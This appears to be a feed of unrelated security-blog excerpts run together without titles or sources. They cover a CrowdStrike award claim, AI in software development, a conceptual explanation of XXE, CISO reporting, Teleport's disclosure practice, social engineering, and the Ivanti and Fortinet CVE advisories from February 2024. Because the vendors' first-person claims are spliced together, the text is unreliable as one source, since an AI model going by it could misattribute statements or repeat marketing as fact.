It is a common refrain in security circles that “nobody loves their vulnerability management tool.” CrowdStrike may have just proved to be the exception. We are proud to announce that CrowdStrike is the only vendor named a Customers’ Choice in the 2024 Gartner “Voice of the Customer” Report for Vulnerability Assessment. In this report, CrowdStrike is the only vendor placed in the upper right quadrant, meaning we received a Customers’ Choice Distinction.

Adding AI to your software development life cycle (SDLC) comes with great opportunities — and great dangers. Is the risk worth the reward? This was the topic of conversation when Sascha Wiswedel, Senior Solutions Engineer at Atlassian, and Simon Maple, Principal Developer Advocate at Snyk, teamed up to discuss security in the (AI-assisted) software development lifecycle.

An XXE vulnerability is a security vulnerability that allows attackers to access sensitive data or execute malicious code in a web application. This happens when the application accepts XML input from an untrusted source and doesn’t properly validate it. An attacker can exploit this vulnerability by crafting a special XML input that includes a reference to an external resource (like a file or URL) that they control.

For security leaders, building a strong working relationship with your CISO often comes down to your ability to provide clear reports and concise risk summaries. Your reports allow CISOs to perform a vital responsibility of their role: translating highly technical security jargon into actionable recommendations that will reduce risk and improve security maturity across the organization. And in the case of a breach or zero-day event, CISOs may be the bearer of bad news.

Teleport is an open source company. We develop in the open, including full disclosure of security issues in our changelogs and pull requests. We share our penetration tests and key compliance reports. Despite this, our communication to open source users and integration with automated security tooling needed improvement. We needed a standardized way to refer to our vulnerabilities so that when two people (or systems) talk about a vulnerability, they know they’re talking about the same thing.

According to Netskope’s recent “Year in Review” Cloud and Threat Report, the most common way cyber attackers gained access to organisations in 2023 was through social engineering. While a favourite tactic of cyber criminals, at its heart, social engineering isn’t about someone breaking code while hunched over a glowing keyboard. It relies on individual human vulnerability, tricking people into opening the door for the attacker to walk through.

On February 8, 2024, Ivanti publicly disclosed a high-severity authentication bypass vulnerability (CVE-2024-22024) impacting Ivanti Connect Secure, Policy Secure, and ZTA products. CVE-2024-22024 is an XML external entity (XXE) flaw in the SAML component and could allow threat actors to bypass authentication and access certain restricted resources if successfully exploited.

On February 8, 2024, Fortinet’s FortiGuard disclosed two critical vulnerabilities affecting FortiOS. CVE-2024-23113, a format string vulnerability, and CVE-2024-21762, an out-of-bounds write vulnerability, could allow unauthenticated threat actors to execute arbitrary code or commands. FortiGuard has stated they are aware of potential exploitation of CVE-2024-21762.